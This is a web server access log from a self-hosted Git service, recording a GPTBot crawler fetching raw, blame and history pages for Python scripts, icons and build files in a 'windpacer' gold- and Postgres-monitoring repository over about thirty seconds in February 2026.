"/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 12448] [Gzip 19.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 226366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 314600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 314600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17377] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 10779] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42721] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 10766] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12522] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 10794] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14481] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17423] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14482] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12524] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 17560] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 973642] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 9862] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 314600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.png" -[17/Feb/2026:13:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 12417] [Gzip 19.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 9858] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 11749] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 12450] [Gzip 19.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 11748] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17688] [Gzip 8.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 226366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 2967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14359] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 901] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12494] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14358] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 901] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 2967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17394] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 226366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" -[17/Feb/2026:13:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 18098] [Gzip 8.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 17561] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14451] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 5792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 11718] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 9869] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 